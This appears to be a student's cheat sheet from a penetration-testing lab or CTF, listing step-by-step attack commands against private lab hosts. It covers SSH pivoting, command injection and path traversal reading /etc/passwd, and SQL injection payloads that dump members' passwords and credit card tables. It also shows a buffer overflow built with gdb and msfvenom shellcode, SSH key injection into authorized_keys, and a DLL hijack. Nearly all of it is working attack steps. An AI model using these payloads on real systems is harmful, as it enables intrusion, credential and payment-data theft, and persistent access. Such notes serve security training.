#############################
      Web Exploitation
#############################

ssh student@10.50.39.165 -L 3001:localhost:22 -NT
ssh -p 3001 student@localhost -D 9050 -NT
  proxychains nmap -Pn 10.100.28.40 -T4
  proxychains nc 10.100.28.40 4444
ssh -p 3001 student@localhost -L 3002:10.100.28.40:80 -NT
firefox
  localhost:3002/net_test/indsutry_check.php
    ;cat /etc/passwd
       www-data:x:33:33:www-data:/var/www:/bin/bash
    ;cat /home/romanoff@mi.ru/contracts
proxychains nmap nmap -v -sT -Pn -T4 --script discovery 10.100.28.40 -p 80
  /uploads
    I took my online training from the following website
    10.100.28.55
ssh -p 3001 student@localhost -L 3003:10.100.28.40:4444 -NT
SSH-KEYGEN through malcious upload
ssh-keygen -t rsa -b 4096
ssh -p 3003 student@localhost
ssh -p 3003 billybob@localhost -D 9050 -NT
  proxychains nmap -Pn 10.100.28.55 -T4
ssh -p 3003 billybob@localhost -L 3004:10.100.28.55:80 -NT
firefox
  localhost:3004
  right-click and inspect
    go to console
      type javascript:win_the_game()
  http://localhost:3004/books_pick.php?book=?../../../../../../../../../../../etc/passwd

#############################
        SQL INJECTION
#############################
1. ssh student@10.50.39.165 -L 3001:localhost:22 -NT
2. ssh -p 3001 student@localhost -D 9050 -NT
  proxychains nmap -Pn 10.100.28.48 -T4
  proxychains nmap nmap -v -sT -Pn -T4 --script discovery 10.100.28.40 -p 80
3. ssh -p 3001 student@localhost -L 3002:10.100.28.48:80 -NT
4. Open firefox
  localhost:3002
5. Under Categories
  in url type OR 1=1 at the end of URL
  now type UNION select 1,2,3 ; at the end of URL
  now type select table_schema, table_name, column_name FROM information_schema.columns at the end of URL
  now type UNION select username,email,password FROM sqlinjection.members at the end of the url
  now type UNION select 1,2,@@version
  now type UNION select creditcard_number,date,id FROM sqlinjection.payments
  now type UNION select comment,data,id FROM sqlinjection.share4
6. Under Search
  type tom' OR 1='1
7. Under Register 
  submit a baseline in which it will give you a baseline query
  In the Username box submit
    hackerdude1', 'password', 'doesitmatter', 3)

#############################
     REVERSE ENGINEERING
#############################


if int var3 == 146
open registry key HKEY 2147483649\Software\Mircosoft\Keyed3 0, 983103 == local_20c
local_20c terminated string 0, DWORD pointer 0 == local_218,local_208,local_214
close local_20c
C:\Users\Public\Documents\Secret == local_210
local_210 and local_108
String var1 = length of string local_108
if not equal to 0
      subtract strings local_208 and local_108

#############################
  EXPLOITATION DEVELOPMENT
#############################
1. ssh student@10.50.39.165 -L 3001:localhost:22 -NT
2. ssh -p 3001 student@localhost -L 3002:192.168.28.111:2222 -NT
3. scp -P 3002 comrade@localhost:/.hidden/inventory.exe .
ON LINOPS
4. gdb inventory.exe
5. pdisass main
      pdisass getTheGoods
            printf
            fgets
6. run till buffer overflow
7. get the 200 character string
8. adjust basic script
9. run <<< $(python inv_buf.py)
10. take the EIP value of 0x63413563 and input it into wiremask
      == 76
11. adjust script again
12. run <<< $(python inv_buf.py)
      EIP value should be 'BBBB'
13. quit
14a. scp -P 3002 inv_buf.py comrade@localhost:/home/comrade
ON THE MACHINE BEING EXPLOITED
14. gdb inventory.exe
      show env
      unset env LINES
      unset env COLOUMNS
      show env
15. run a buffer overflow
16. info proc map
      0xf7def000   ::   0xfffdd000
17. find /b 0xf7def000 , 0xfffdd000, 0xff, 0xe4
    0xf7de3b59
    0xf7f588ab
    0xf7f645fb
    0xf7f6460f
    0xf7f64aeb
18. adjust script
ON LINOPS
19. msfconsole
  use payload/linux/x86/exec
    show options
  set CMD cat /.secret/.verysecret.pdb
    show options
  generate -b "\x00" -f python
ON MACHINE BEING EXPLOITED
20. adjust script
21. sudo ./inventory.exe <<< $(python lin_buf.py)
      if it errors out re-generate payload

--- WINDOWS ---
1. ssh student@10.50.39.165 -L 3001:localhost:22 -NT
2. ssh -p 3001 student@localhost -L 3002:192.168.28.120:4242 -NT
3. ssh -p 3002 student@localhost -L 3003:192.168.150.245:9999 -NT
4. change the script to the ip address localhost and the port to 3003
5. run the expliot in meterpreter (check notes for set up)
6. run the script

#########################
   POST EXPLOITATION 
#########################
1. ssh student@10.50.39.165 -L 3001:localhost:22 -NT
2. ssh -p 3001 student@localhost -L 3002:192.168.28.100:80 -NT
3. firefox
      localhost:3002/admin/login.php
4. in username and password type
      tom' OR 1='1
5. make .ssh directory and keys document
      ;mkdir /var/www/.ssh
      ;touch /var/www/.ssh/authorized_keys
6. make private key
      ssh-keygen -t rsa
      cat ~/.ssh/id_rsa.pub
7. command injection/ ssh-key injection
      ;echo "<key_here>" >> /var/www/.ssh/authorized_keys
8. ssh -p 3001 student@localhost -L 3003:192.168.28.100:2222 -NT
9. ssh -p 3003 www-data@localhost
10. find / -name network* 2>/dev/null
11. ls -la /home/comrade/Dekstop/network
      cat nmapkey.txt
12. scp -P 3003 www-data@localhost:/home/comrade/Dekstop/network/map.png
13. find / -name *inventory* 2>/dev/null


#########################
  WINDOWS EXPLOITATION 
#########################
1. ssh student@10.50.39.165 -L 3001:localhost:22 -NT
2. ssh -p 3001 student@localhost -L 3005:192.168.28.105:2222 -NT
3. ssh -p 3005 comrade@localhost -L 3006:192.168.28.5:3389 -NT
4. xfreerdp /u:comrade /v:localhost:3006 +glyph-cache +clipboard +dynamic-resolution
5. Go to c:\users\comrade and open the security log file
      look for all events triggered on 05-31 between 1200 and 1330. Looking inside the details page on the lower tab identify Fortnite
6. net use * http://live.sysinternals.com
      Z:
7. go to services and look for a service without a description
8. go to file path and check to see if you can write and delete files
9. check configuration file and look for .dll
10. msfvenom -p windows/exec CMD='cmd.exe /C cat C:\Users\Admin\Desktop\flag.txt > C:\\flag.txt' -f dll > hijackmeplz.dll

     












